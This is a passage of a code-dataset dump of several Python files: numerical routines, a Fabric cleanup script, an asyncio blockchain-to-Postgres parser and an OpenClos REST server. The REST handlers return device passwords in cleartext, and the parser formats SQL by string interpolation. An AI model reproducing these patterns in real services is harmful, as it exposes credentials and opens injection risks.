maxIter)\n\t\n\ntry:\n\tx0 = 0\n\tx1 = 1\n\te = 0.0005\n\tmaxIter = 50\n\t(hasError, root) = secante(funcao, x0, x1, e, maxIter)\nexcept IndexError:\n\tprint(\"usage: bigdigits.py \")\nexcept ValueError as err:\n\tprint(err, \" in \", digits)\n","sub_path":"secante.py","file_name":"secante.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179585913","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 16 12:39:43 2018\n\n@author: joshuajacob\n\"\"\"\nimport numpy\nimport timeit\n\n \ndef primes_list_b(n):\n x = numpy.ones(n, dtype = numpy.bool)\n i = 2\n x[0] = x[1] = False\n while i= 0:\n number = 1 if number == 0 else number\n local('for i in `ls -1t {} | tail -n +{}`; do rm -f {}$i ; done'\n .format(local_path, number + 1, local_path))\n run('for i in `ls -1t {} | tail -n +{}`; do rm -rf {}$i ; done'\n .format(remote_path, number + 1, remote_path))\n","sub_path":"100-clean_web_static.py","file_name":"100-clean_web_static.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"522852977","text":"import os\nimport sys\nimport re\nfrom sanic import Blueprint\nfrom sanic.response import json\nfrom sanic.log import logger\nimport asyncio\nimport aiohttp\nimport requests\nimport psycopg2\nimport json as pjson\nfrom psycopg2.extras import execute_values\nimport sendgrid\nfrom sendgrid.helpers.mail import *\nimport hashlib\nfrom datetime import datetime\nfrom time import time\nfrom .errors import bad_request\nimport configparser\nimport uuid\nimport signal\nimport subprocess\nimport base58\nfrom .utils import verify_signature\nimport xml.etree.ElementTree as ET\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nparser = Blueprint('parser_v1', url_prefix='/parser')\ndsn = {\n \"user\": config['DB']['user'],\n \"password\": 
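Two notes on the records above. First, the coronavirus-map script calls pd.read_csv and pd.isnull but only imports folium, os and json; for it to run, the import block needs pandas as well. A sketch of the corrected header, same path as the original:

import folium
import os
import json
import pandas as pd  # required by pd.read_csv and pd.isnull below

df = pd.read_csv('data/time_series_covid19_confirmed.csv')

Second, the primes_list_b record is truncated mid-loop (its text runs into an unrelated Fabric deployment script), so for reference only, a standard complete NumPy sieve (not the author's original) looks like:

import numpy as np

def primes_sieve(n):
    # Sieve of Eratosthenes: flags[i] is True iff i is prime, for i < n.
    flags = np.ones(n, dtype=bool)
    flags[:2] = False
    for i in range(2, int(n ** 0.5) + 1):
        if flags[i]:
            flags[i * i::i] = False
    return np.flatnonzero(flags)

print(primes_sieve(30))  # [ 2  3  5  7 11 13 17 19 23 29]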
config['DB']['password'],\n \"database\": config['DB']['database'],\n \"host\": config['DB']['host'],\n \"port\": config['DB']['port'],\n \"sslmode\": config['DB']['sslmode'],\n \"target_session_attrs\": config['DB']['target_session_attrs']\n}\n\n\nclass Parser:\n def __init__(self):\n self.height = 1\n self.last_block = None\n self.step = 5\n self.blocks_to_check = 5\n\n self.db_reconnects = 0\n self.db_max_reconnects = 10\n self.transactions_inserted = 0\n\n self.sql_data_transactions = []\n self.sql_data_proofs = []\n self.sql_data_cdms = []\n self.sql_data_senders = []\n\n async def emergency_stop_loop(self, title, error):\n # email_body = \"\"\"\n #

{0}\n # Height: {1}\n # Error: {2}

\n # \"\"\".format(title, self.height, error)\n # logger.info('Sending email')\n # from_email = Email(\"noreply@chainify.org\")\n # to_email = Email('aboziev@gmail.com')\n # subject = \"Parser error detected\"\n # email_content = Content(\"text/html\", email_body)\n # sg_mail = Mail(from_email, subject, to_email, email_content)\n # response = email.client.mail.send.post(request_body=sg_mail.get())\n # logger.info('Email sent. Status code {0}'.format(response.status_code))\n\n logger.info('Emergency loop stop request')\n logger.info('Reason: {}'.format(error))\n logger.info('Closing tasks')\n for task in asyncio.Task.all_tasks():\n task.cancel()\n\n logger.info('Stopping loop')\n loop = asyncio.get_running_loop()\n loop.stop()\n return bad_request(error)\n\n async def fetch_data(self, url, session):\n try:\n async with session.get(url) as response:\n data = await response.text()\n data = pjson.loads(data)\n cnfy_id = 'cnfy-{}'.format(str(uuid.uuid4()))\n\n for tx in data['transactions']:\n if tx['type'] in [4] and tx['feeAssetId'] == config['blockchain']['asset_id']:\n \n attachment_base58 = base58.b58decode(tx['attachment']).decode('utf-8')\n attachment = requests.get('{0}:{1}/ipfs/{2}'.format(config['ipfs']['host'], config['ipfs']['get_port'], attachment_base58)).text\n attachment_hash = hashlib.sha256(attachment.encode('utf-8')).hexdigest()\n\n root = ET.fromstring(attachment)\n version = root.findall('version')[0].text if len(root.findall('version')) > 0 else None\n blockchain = root.findall('blockchain')[0].text if len(root.findall('blockchain')) > 0 else None\n network = root.findall('network')[0].text if len(root.findall('network')) > 0 else None\n messages = root.findall('messages')[0] if len(root.findall('messages')) > 0 else []\n \n # members = [tx['senderPublicKey']]\n # for message in messages:\n # to_public_key = None\n # to = message.findall('to')[0] if len(message.findall('to')) > 0 else None\n # if to:\n # to_public_key = to.findall('publickey')[0].text if len(to.findall('publickey')) > 0 else None\n # if to_public_key and to_public_key not in members:\n # members.append(to_public_key)\n\n # cc_public_key = None\n # cc = message.findall('cc')[0] if len(message.findall('cc')) > 0 else None\n # if cc:\n # cc_public_key = cc.findall('publickey')[0].text if len(cc.findall('publickey')) > 0 else None\n # if cc_public_key and cc_public_key not in members:\n # members.append(cc_public_key)\n\n # group_hash = hashlib.sha256(''.join(sorted(members)).encode('utf-8')).hexdigest()\n for message in messages:\n to_public_key = None\n cc_public_key = None\n to = message.findall('to')[0] if len(message.findall('to')) > 0 else None\n cc = message.findall('cc')[0] if len(message.findall('cc')) > 0 else None\n if to:\n to_public_key = to.findall('publickey')[0].text if len(to.findall('publickey')) > 0 else None\n if cc:\n cc_public_key = cc.findall('publickey')[0].text if len(cc.findall('publickey')) > 0 else None\n\n subject_ciphertext = None\n subject_sha256hash = None\n subject = message.findall('subject')[0] if len(message.findall('subject')) > 0 else None\n if subject:\n subject_ciphertext = subject.findall('ciphertext')[0].text if len(subject.findall('ciphertext')) > 0 else None\n subject_sha256hash = subject.findall('sha256')[0].text if len(subject.findall('sha256')) > 0 else None\n\n body_ciphertext = None\n body_sha256hash = None\n body = message.findall('body')[0] if len(message.findall('body')) > 0 else None\n if body:\n body_ciphertext = body.findall('ciphertext')[0].text if 
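One detail worth flagging in emergency_stop_loop above: asyncio.Task.all_tasks() was deprecated in Python 3.7 and removed in 3.9. The same shutdown on current interpreters, standard library only, would read:

import asyncio

async def cancel_everything():
    # Cancel every task on the running loop except this one, then stop it.
    for task in asyncio.all_tasks():
        if task is not asyncio.current_task():
            task.cancel()
    asyncio.get_running_loop().stop()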
len(body.findall('ciphertext')) > 0 else None\n body_sha256hash = body.findall('sha256')[0].text if len(body.findall('sha256')) > 0 else None\n\n recipient_public_key = to_public_key if to_public_key else cc_public_key\n recipient_type = 'to' if to_public_key else 'cc'\n\n group_hash = hashlib.sha256(''.join([subject_sha256hash or '', body_sha256hash or '']).encode('utf-8')).hexdigest()\n extra = message.findall('extra')[0] if len(message.findall('extra')) > 0 else None\n if extra:\n group_hash = extra.findall('groupHash')[0].text if len(extra.findall('groupHash')) > 0 else None\n\n cdm_id = 'cdm-' + str(uuid.uuid4())\n self.sql_data_cdms.append((\n cdm_id,\n tx['id'],\n recipient_public_key,\n subject_ciphertext,\n subject_sha256hash,\n body_ciphertext,\n body_sha256hash,\n group_hash,\n blockchain,\n network,\n recipient_type\n ))\n \n senders = message.findall('from')[0] if len(message.findall('from')) > 0 else None\n if senders:\n for sender in senders:\n sender_public_key = sender.findall('publickey')[0].text if len(sender.findall('publickey')) > 0 else None\n signature = sender.findall('signature')[0].text if len(sender.findall('signature')) > 0 else None\n\n sender_id = str(uuid.uuid4()) \n self.sql_data_senders.append((sender_id, cdm_id, sender_public_key, signature, True))\n\n tx_data = (\n tx['id'],\n data['height'],\n tx['type'],\n tx['sender'],\n tx['senderPublicKey'],\n tx['recipient'],\n tx['amount'],\n tx['assetId'],\n tx['feeAssetId'],\n tx['feeAsset'],\n tx['fee'],\n tx['attachment'],\n tx['version'],\n datetime.fromtimestamp(tx['timestamp'] / 1e3),\n cnfy_id,\n attachment_hash,\n attachment\n )\n \n self.sql_data_transactions.append(tx_data)\n\n for proof in tx['proofs']:\n self.sql_data_proofs.append((tx['id'], proof))\n\n \n\n except asyncio.CancelledError:\n logger.info('Parser has been stopped')\n raise\n except Exception as error:\n logger.error('Fetching data error: {}'.format(error))\n pass\n # await self.emergency_stop_loop('Fetch data', error)\n\n async def save_data(self):\n conn = psycopg2.connect(**dsn)\n try:\n with conn:\n with conn.cursor() as cur:\n if len(self.sql_data_transactions) > 0:\n sql = \"\"\"INSERT INTO transactions (id, height, type, sender, sender_public_key, recipient,\n amount, asset_id, fee_asset_id, fee_asset, fee, attachment, version, timestamp, cnfy_id, attachment_hash, attachment_text)\n VALUES %s ON CONFLICT (id) DO UPDATE SET height = EXCLUDED.height\"\"\"\n execute_values(cur, sql, self.sql_data_transactions)\n if cur.rowcount > 0:\n self.transactions_inserted += cur.rowcount\n\n sql = \"\"\"INSERT INTO proofs (tx_id, proof) VALUES %s ON CONFLICT DO NOTHING\"\"\"\n execute_values(cur, sql, self.sql_data_proofs)\n\n sql = \"\"\"INSERT INTO cdms (id, tx_id, recipient, subject, subject_hash, message, message_hash, group_hash, blockchain, network, type)\n VALUES %s ON CONFLICT DO NOTHING\"\"\"\n execute_values(cur, sql, self.sql_data_cdms) \n\n if len(self.sql_data_senders) > 0:\n sql = \"\"\"INSERT INTO senders (id, cdm_id, sender, signature, verified)\n VALUES %s ON CONFLICT DO NOTHING\"\"\"\n execute_values(cur, sql, self.sql_data_senders) \n\n conn.commit()\n logger.info('Saved {0} transactions'.format(self.transactions_inserted))\n\n except psycopg2.IntegrityError as error:\n logger.info('Error', error)\n pass\n except asyncio.CancelledError:\n logger.info('Parser has been stopped')\n raise\n except Exception as error:\n logger.info('Height: {}'.format(self.height))\n logger.error('Batch insert error: {}'.format(error))\n await 
self.emergency_stop_loop('Batch insert error', error)\n finally:\n self.transactions_inserted = 0\n self.sql_data_transactions = []\n self.sql_data_proofs = []\n self.sql_data_cdms = []\n self.sql_data_senders = []\n\n async def start(self):\n conn = None\n try:\n conn = psycopg2.connect(**dsn)\n except psycopg2.OperationalError as error:\n logger.error('Postgres Engine Error:', error)\n await self.emergency_stop_loop('No conn error', 'Error on connection to Postgres Engine')\n\n try:\n with conn:\n with conn.cursor() as cur:\n cur.execute(\"SELECT max(height) FROM transactions\")\n max_height = cur.fetchone()\n\n if max_height and max_height[0]:\n if max_height[0] > self.blocks_to_check:\n self.height = max_height[0] - self.blocks_to_check\n\n if config['blockchain']['start_height']:\n start_height = int(config['blockchain']['start_height'])\n if self.height < start_height:\n self.height = start_height\n\n \n except Exception as error:\n logger.error('Max height request error: {}'.format(error))\n await self.emergency_stop_loop('Max height request error', error)\n\n while True:\n try:\n req = requests.get('{0}/node/status'.format(config['blockchain']['host']))\n data = req.json()\n self.last_block = int(data['blockchainHeight'])\n\n with conn:\n with conn.cursor() as cur:\n if self.height > self.last_block:\n cur.execute(\"\"\"\n DELETE FROM transactions WHERE height > '{height}'\n \"\"\".format(\n height=self.last_block\n ))\n self.height = self.last_block\n conn.commit()\n\n except Exception as error:\n await self.emergency_stop_loop('Waves node is not responding', error)\n\n logger.info('Start height: {}, last block: {}'.format(self.height, self.last_block))\n logger.info('-' * 40)\n try:\n async with aiohttp.ClientSession() as session:\n try:\n while self.height < self.last_block:\n t0 = time()\n batch = self.height + self.step\n if self.height + self.step >= self.last_block:\n batch = self.last_block + 1\n\n batch_range = (self.height, batch)\n tasks = []\n for i in range(batch_range[0], batch_range[1]):\n url = '{0}/blocks/at/{1}'.format(config['blockchain']['host'], self.height)\n task = asyncio.create_task(self.fetch_data(url, session))\n tasks.append(task)\n self.height += 1\n logger.info('Height range {0} - {1}'.format(batch_range[0], batch_range[1]))\n await asyncio.gather(*tasks)\n await self.save_data()\n logger.info('Parsing time: {0} sec'.format(time() - t0))\n logger.info('-' * 40)\n\n except asyncio.CancelledError:\n logger.info('Parser stopping...')\n raise\n except Exception as error:\n logger.error('Blocks session cycle error on height {0}: {1}'.format(self.height, error))\n await self.emergency_stop_loop('Blocks session cycle error', error)\n\n except asyncio.CancelledError:\n logger.info('Parser has been stopped')\n raise\n except Exception as error:\n logger.error('Request blocks cycle error: {0}'.format(error))\n await self.emergency_stop_loop('Request blocks cycle', error)\n finally:\n self.height = self.height - self.blocks_to_check\n await asyncio.sleep(2)\n\n\ncontrols = Parser()\n\n@parser.listener('after_server_start')\ndef autostart(app, loop):\n loop.create_task(controls.start())\n logger.info('Autostart Success!')\n\n@parser.listener('after_server_stop')\ndef gentle_exit(app, loop):\n logger.info('Killing the process')\n os.kill(os.getpid(), signal.SIGKILL)\n\n# @parser.route('/start', methods=['POST'])\n# def controls_start(request):\n# loop = asyncio.get_running_loop()\n# loop.create_task(controls.start())\n# return json({\"action\": \"start\", 
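save_data above leans on psycopg2's execute_values for batched upserts; the pattern in isolation looks like the sketch below (table and column names are placeholders, not taken from the dump):

import psycopg2
from psycopg2.extras import execute_values

rows = [('tx-1', 10), ('tx-2', 20)]
with psycopg2.connect(dbname='demo') as conn:
    with conn.cursor() as cur:
        # execute_values expands the single "VALUES %s" into a multi-row list.
        execute_values(
            cur,
            "INSERT INTO items (id, amount) VALUES %s ON CONFLICT DO NOTHING",
            rows)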
\"status\": \"OK\"})\n\n@parser.route('/healthcheck', methods=['GET'])\ndef container_healthcheck(request):\n return json({\"action\": \"healthcheck\", \"status\": \"OK\"})\n\n\n# @parser.route('/stop', methods=['POST'])\n# def controls_stop(request):\n# try:\n# loop = asyncio.get_running_loop()\n# tasks = [t for t in asyncio.all_tasks() if t is not\n# asyncio.current_task()]\n\n# [task.cancel() for task in tasks]\n\n# logger.info('Canceling outstanding tasks')\n# asyncio.gather(*tasks)\n# loop.stop()\n# logger.info('Shutdown complete.')\n\n# except Exception as error:\n# return bad_request(error)\n\n# return json({\"action\": \"stop\", \"status\": \"OK\"})\n","sub_path":"parser/api/v1/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":17712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"392614471","text":"'''\nCreated on Sep 2, 2014\n\n@author: moloyc\n'''\n\nimport os\nimport bottle\nfrom sqlalchemy.orm import exc\nimport StringIO\nimport zipfile\nimport traceback\nimport json\nimport util\nimport logging\n\nfrom bottle import error, request, response, PluginError\nfrom exception import RestError\nfrom model import Pod, Device\nfrom dao import Dao\nfrom report import ResourceAllocationReport, L2Report, L3Report\nfrom l3Clos import L3ClosMediation\nfrom ztp import ZtpServer\nfrom jnpr.openclos.util import isSqliteUsed\n\nmoduleName = 'rest'\nlogger = None\n\nwebServerRoot = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'out')\njunosImageRoot = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf', 'ztp')\n\ndef loggingPlugin(callback):\n def wrapper(*args, **kwargs):\n msg = '\"{} {} {}\"'.format(request.method, request.path,\n request.environ.get('SERVER_PROTOCOL', ''))\n \n if logger.isEnabledFor(logging.DEBUG):\n logger.debug('%s REQUEST: %s' % (msg, request._get_body_string()))\n else:\n logger.info('%s REQUEST:' % (msg))\n \n try:\n responseBody = callback(*args, **kwargs)\n except bottle.HTTPError as exc:\n logger.error('HTTPError: status: %s, body: %s, exception: %s' % (exc.status, exc.body, exc.exception))\n raise\n except Exception as exc:\n logger.error('Unknown error: %s' % (exc))\n logger.info('StackTrace: %s' % (traceback.format_exc()))\n raise\n \n if logger.isEnabledFor(logging.DEBUG):\n logger.debug('%s RESPONSE %s: %s' % (msg, response.status_code, responseBody))\n else:\n logger.info('%s RESPONSE %s:' % (msg, response.status_code))\n \n return responseBody\n return wrapper\n\n\nclass OpenclosDbSessionPlugin(object):\n name = 'OpenclosDbSessionPlugin'\n\n def __init__(self, daoClass = Dao):\n self.__dao = daoClass.getInstance()\n\n def setup(self, app):\n ''' Make sure that other installed plugins don't affect the same keyword argument.'''\n for plugin in app.plugins:\n if not isinstance(plugin, OpenclosDbSessionPlugin): \n continue\n else:\n raise PluginError(\"Found another OpenclosDbSessionPlugin already installed\")\n\n def apply(self, callback, context):\n def wrapper(*args, **kwargs):\n if request.method == 'POST' or request.method == 'PUT' or request.method == 'DELETE':\n with self.__dao.getReadWriteSession() as dbSession:\n kwargs['dbSession'] = dbSession\n responseBody = callback(*args, **kwargs)\n else:\n with self.__dao.getReadSession() as dbSession:\n kwargs['dbSession'] = dbSession\n responseBody = callback(*args, **kwargs)\n return responseBody\n\n # Replace the route callback with the wrapped one.\n return wrapper\n \nclass ResourceLink():\n def __init__(self, 
baseUrl, path):\n self.baseUrl = baseUrl\n self.path = path\n def toDict(self):\n return {'href': self.baseUrl + self.path}\n\nclass RestServer():\n def __init__(self, conf = {}, daoClass = Dao):\n global logger\n if any(conf) == False:\n self.__conf = util.loadConfig(appName = moduleName)\n global webServerRoot\n webServerRoot = self.__conf['outputDir']\n else:\n self.__conf = conf\n logger = logging.getLogger(moduleName)\n \n self.__daoClass = daoClass\n self.__dao = daoClass.getInstance()\n self.openclosDbSessionPlugin = OpenclosDbSessionPlugin(daoClass)\n \n if 'httpServer' in self.__conf and 'ipAddr' in self.__conf['httpServer'] and self.__conf['httpServer']['ipAddr'] is not None:\n self.host = self.__conf['httpServer']['ipAddr']\n else:\n self.host = 'localhost'\n\n if 'httpServer' in self.__conf and 'port' in self.__conf['httpServer']:\n self.port = self.__conf['httpServer']['port']\n else:\n self.port = 8080\n self.baseUrl = 'http://%s:%d' % (self.host, self.port)\n\n self.report = ResourceAllocationReport(self.__conf, daoClass)\n # Create a single instance of l2Report as it holds thread-pool\n # for device connection. Don't create l2Report multiple times \n self.l2Report = L2Report(self.__conf, daoClass)\n # Create a single instance of l3Report as it holds thread-pool\n # for device connection. Don't create l3Report multiple times \n self.l3Report = L3Report(self.__conf, daoClass)\n\n \n def initRest(self):\n self.addRoutes(self.baseUrl)\n self.app = bottle.app()\n self.app.install(loggingPlugin)\n self.app.install(self.openclosDbSessionPlugin)\n logger.info('RestServer initRest() done')\n\n def _reset(self):\n \"\"\"\n Resets the state of the rest server and application\n Used for Test only\n \"\"\"\n self.app.uninstall(loggingPlugin)\n self.app.uninstall(OpenclosDbSessionPlugin)\n\n\n def start(self):\n logger.info('REST server starting at %s:%d' % (self.host, self.port))\n debugRest = False\n if logger.isEnabledFor(logging.DEBUG):\n debugRest = True\n\n if util.isSqliteUsed(self.__conf):\n bottle.run(self.app, host=self.host, port=self.port, debug=debugRest)\n else:\n bottle.run(self.app, host=self.host, port=self.port, debug=debugRest, server='paste')\n\n\n @staticmethod\n @error(400)\n def error400(error):\n bottle.response.headers['Content-Type'] = 'application/json'\n if error.exception is not None:\n return json.dumps({'errorCode': error.exception.errorId , 'errorMessage' : error.exception.errorMessage})\n else:\n return json.dumps({'errorCode': 0, 'errorMessage' : 'A generic error occurred'})\n \n def addRoutes(self, baseUrl):\n self.indexLinks = []\n\n # GET APIs\n bottle.route('/', 'GET', self.getIndex)\n bottle.route('/openclos', 'GET', self.getIndex)\n bottle.route('/openclos/conf', 'GET', self.getOpenClosConfigParams)\n bottle.route('/openclos/ip-fabrics', 'GET', self.getIpFabrics)\n bottle.route('/openclos/images/', 'GET', self.getJunosImage)\n bottle.route('/openclos/ip-fabrics/', 'GET', self.getIpFabric)\n bottle.route('/openclos/ip-fabrics//cabling-plan', 'GET', self.getCablingPlan)\n bottle.route('/openclos/ip-fabrics//ztp-configuration','GET', self.getZtpConfig)\n bottle.route('/openclos/ip-fabrics//device-configuration', 'GET', self.getDeviceConfigsInZip)\n bottle.route('/openclos/ip-fabrics//leaf-generic-configurations/', 'GET', self.getLeafGenericConfiguration)\n bottle.route('/openclos/ip-fabrics//l2-report', 'GET', self.getL2Report)\n bottle.route('/openclos/ip-fabrics//l3-report', 'GET', self.getL3Report)\n bottle.route('/openclos/ip-fabrics//devices', 
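OpenclosDbSessionPlugin above follows bottle's v2 plugin protocol: an apply() hook that wraps every route callback. A stripped-down plugin of the same shape, with illustrative names only:

import time
import bottle

class TimingPlugin(object):
    name = 'TimingPlugin'
    api = 2  # bottle's v2 plugin API passes the Route object to apply()

    def apply(self, callback, route):
        def wrapper(*args, **kwargs):
            start = time.time()
            body = callback(*args, **kwargs)
            print('%s took %.3fs' % (route.rule, time.time() - start))
            return body
        return wrapper

app = bottle.app()
app.install(TimingPlugin())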
'GET', self.getDevices)\n bottle.route('/openclos/ip-fabrics//devices/', 'GET', self.getDevice)\n bottle.route('/openclos/ip-fabrics//devices//config', 'GET', self.getDeviceConfig)\n\n # POST/PUT APIs\n bottle.route('/openclos/ip-fabrics', 'POST', self.createIpFabric)\n bottle.route('/openclos/ip-fabrics//cabling-plan', 'PUT', self.createCablingPlan)\n bottle.route('/openclos/ip-fabrics//device-configuration', 'PUT', self.createDeviceConfiguration)\n bottle.route('/openclos/ip-fabrics//ztp-configuration', 'PUT', self.createZtpConfiguration)\n bottle.route('/openclos/ip-fabrics/', 'PUT', self.reconfigIpFabric)\n bottle.route('/openclos/conf/', 'PUT', self.setOpenClosConfigParams)\n\n # DELETE APIs\n bottle.route('/openclos/ip-fabrics/', 'DELETE', self.deleteIpFabric)\n\n self.createLinkForConfigs()\n\n def createLinkForConfigs(self):\n # index page should show all top level URLs\n # users whould be able to drill down through navigation\n self.indexLinks.append(ResourceLink(self.baseUrl, '/openclos/ip-fabrics'))\n self.indexLinks.append(ResourceLink(self.baseUrl, '/openclos/conf'))\n \n def getIndex(self, dbSession=None):\n if 'openclos' not in bottle.request.url:\n bottle.redirect(bottle.request.url + 'openclos')\n\n jsonLinks = []\n for link in self.indexLinks:\n jsonLinks.append({'link': link.toDict()})\n\n jsonBody = \\\n {'href': bottle.request.url,\n 'links': jsonLinks\n }\n\n return jsonBody\n \n def getIpFabrics(self, dbSession):\n \n url = bottle.request.url\n ipFabricsData = {}\n listOfIpFbarics = []\n IpFabrics = self.report.getPods(dbSession)\n logger.debug(\"count of ipFabrics: %d\", len(IpFabrics))\n if not IpFabrics : \n logger.debug(\"There are no ipFabrics in the system \")\n \n for i in range(len(IpFabrics)):\n ipFabric = {}\n ipFabric['uri'] = url +'/'+ IpFabrics[i]['id']\n ipFabric['id'] = IpFabrics[i]['id']\n ipFabric['name'] = IpFabrics[i]['name']\n ipFabric['spineDeviceType'] = IpFabrics[i]['spineDeviceType']\n ipFabric['spineCount'] = IpFabrics[i]['spineCount']\n ipFabric['leafSettings'] = IpFabrics[i]['leafSettings']\n ipFabric['leafCount'] = IpFabrics[i]['leafCount']\n ipFabric['devicePassword'] = IpFabrics[i]['devicePassword']\n listOfIpFbarics.append(ipFabric)\n ipFabricsData['ipFabric'] = listOfIpFbarics\n ipFabricsData['total'] = len(listOfIpFbarics)\n ipFabricsData['uri'] = url \n return {'ipFabrics' : ipFabricsData}\n \n def getIpFabric(self, dbSession, ipFabricId, requestUrl = None):\n if requestUrl is None:\n requestUrl = bottle.request.url\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n outputDict = {} \n devices = ipFabric.devices\n outputDict['id'] = ipFabric.id\n outputDict['name'] = ipFabric.name\n outputDict['description'] = ipFabric.description \n outputDict['spineAS'] = ipFabric.spineAS\n outputDict['spineDeviceType'] = ipFabric.spineDeviceType\n outputDict['spineCount'] = ipFabric.spineCount\n outputDict['leafAS'] = ipFabric.leafAS\n outputDict['leafSettings'] = []\n for leafSetting in ipFabric.leafSettings:\n outputDict['leafSettings'].append({'deviceType': leafSetting.deviceFamily, 'junosImage': leafSetting.junosImage})\n outputDict['leafCount'] = ipFabric.leafCount\n outputDict['loopbackPrefix'] = ipFabric.loopbackPrefix \n outputDict['vlanPrefix'] = ipFabric.vlanPrefix\n outputDict['interConnectPrefix'] = ipFabric.interConnectPrefix \n outputDict['managementPrefix'] = ipFabric.managementPrefix\n outputDict['outOfBandAddressList'] = ipFabric.outOfBandAddressList\n outputDict['outOfBandGateway'] = 
ipFabric.outOfBandGateway \n outputDict['topologyType'] = ipFabric.topologyType\n outputDict['spineJunosImage'] = ipFabric.spineJunosImage\n outputDict['devicePassword'] = ipFabric.getCleartextPassword()\n outputDict['uri'] = requestUrl\n outputDict['devices'] = {'uri': requestUrl + '/devices', 'total':len(devices)}\n outputDict['cablingPlan'] = {'uri': requestUrl + '/cabling-plan'}\n outputDict['deviceConfiguration'] = {'uri': requestUrl + '/device-configuration'}\n outputDict['ztpConfiguration'] = {'uri': requestUrl + '/ztp-configuration'}\n outputDict['l2Report'] = {'uri': requestUrl + '/l2-report'}\n outputDict['l3Report'] = {'uri': requestUrl + '/l3-report'}\n \n logger.debug('getIpFabric: %s' % (ipFabricId))\n \n return {'ipFabric': outputDict}\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n def getCablingPlan(self, dbSession, ipFabricId):\n \n header = bottle.request.get_header('Accept')\n logger.debug('Accept header: %s' % (header))\n\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n logger.debug('IpFabric name: %s' % (ipFabric.name))\n \n if header == 'application/json':\n cablingPlan = ipFabric.cablingPlan\n if cablingPlan is not None and cablingPlan.json is not None:\n logger.debug('CablingPlan found in DB')\n return cablingPlan.json\n else:\n raise bottle.HTTPError(404, \"IpFabric: %s exists but no CablingPlan found in DB\" % (ipFabric.id))\n \n else:\n ipFabricFolder = ipFabric.id + '-' + ipFabric.name\n fileName = os.path.join(ipFabricFolder, 'cablingPlan.dot')\n logger.debug('webServerRoot: %s, fileName: %s, exists: %s' % (webServerRoot, fileName, os.path.exists(os.path.join(webServerRoot, fileName))))\n logger.debug('Cabling file name: %s' % (fileName)) \n cablingPlan = bottle.static_file(fileName, root=webServerRoot)\n\n if isinstance(cablingPlan, bottle.HTTPError):\n raise bottle.HTTPError(404, \"IpFabric exists but no CablingPlan found. IpFabric: '%s \" % (ipFabricFolder))\n return cablingPlan\n \n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n\n def getLeafGenericConfiguration(self, dbSession, ipFabricId, deviceModel):\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is None:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n logger.debug('IpFabric name: %s, id: %s' % (ipFabric.name, ipFabricId))\n \n leafSetting = self.__dao.getLeafSetting(dbSession, ipFabricId, deviceModel)\n if leafSetting is None or leafSetting.config is None:\n raise bottle.HTTPError(404, \"IpFabric exists but no leaf generic config found, probably configuration \\\n was not created. 
deviceModel: %s, ipFabric name: '%s', id: '%s'\" % (deviceModel, ipFabric.name, ipFabricId))\n \n bottle.response.headers['Content-Type'] = 'application/json'\n return leafSetting.config\n\n def getDeviceConfigsInZip(self, dbSession, ipFabricId):\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is None:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n logger.debug('IpFabric name: %s' % (ipFabric.name))\n\n zippedConfigFiles = self.createZipArchive(ipFabric)\n if zippedConfigFiles is not None:\n bottle.response.headers['Content-Type'] = 'application/zip'\n return zippedConfigFiles\n else:\n raise bottle.HTTPError(404, \"IpFabric exists but no configs for devices.'%s \" % (ipFabric.name))\n\n def createZipArchive(self, ipFabric):\n\n buff = StringIO.StringIO()\n zipArchive = zipfile.ZipFile(buff, mode='w')\n for device in ipFabric.devices:\n fileName = device.id + '__' + device.name + '.conf'\n if device.config is not None:\n zipArchive.writestr(fileName, device.config.config)\n \n if ipFabric.leafSettings is not None:\n for leafSetting in ipFabric.leafSettings:\n if leafSetting.config is not None:\n zipArchive.writestr(leafSetting.deviceFamily + '.conf', leafSetting.config)\n \n zipArchive.close()\n logger.debug('zip file content:\\n' + str(zipArchive.namelist()))\n return buff.getvalue()\n\n def getDevices(self, dbSession, ipFabricId):\n \n devices = {}\n listOfDevices = []\n ipFabric = self.report.getIpFabric(dbSession, ipFabricId)\n if ipFabric is not None:\n for device in ipFabric.devices:\n outputDict = {}\n outputDict['id'] = device.id\n outputDict['name'] = device.name\n outputDict['role'] = device.role\n outputDict['family'] = device.family\n outputDict['macAddress'] = device.macAddress\n outputDict['managementIp'] = device.managementIp\n outputDict['serialNumber'] = device.serialNumber\n outputDict['deployStatus'] = device.deployStatus\n outputDict['configStatus'] = device.configStatus\n outputDict['l2Status'] = device.l2Status\n outputDict['l3Status'] = device.l3Status\n outputDict['uri'] = bottle.request.url + '/' +device.id\n listOfDevices.append(outputDict)\n devices['device'] = listOfDevices\n devices['uri'] = bottle.request.url\n devices['total'] = len(ipFabric.devices)\n return {'devices' : devices}\n else:\n raise bottle.HTTPError(404, \"IpFabric with id: %s not found\" % (ipFabricId))\n \n def getDevice(self, dbSession, ipFabricId, deviceId):\n \n device = self.isDeviceExists(dbSession, ipFabricId, deviceId)\n #ipFabricUri is constructed from url\n url = bottle.request.url\n uri = url.split(\"/\")\n uri.pop()\n uri.pop()\n ipFbaricUri = \"/\".join(uri)\n \n if device is not None:\n outputDict = {}\n outputDict['id'] = device.id\n outputDict['name'] = device.name\n outputDict['role'] = device.role\n outputDict['family'] = device.family\n outputDict['username'] = device.username\n outputDict['password'] = device.getCleartextPassword()\n outputDict['macAddress'] = device.macAddress\n outputDict['managementIp'] = device.managementIp\n outputDict['asn'] = device.asn\n outputDict['configStatus'] = 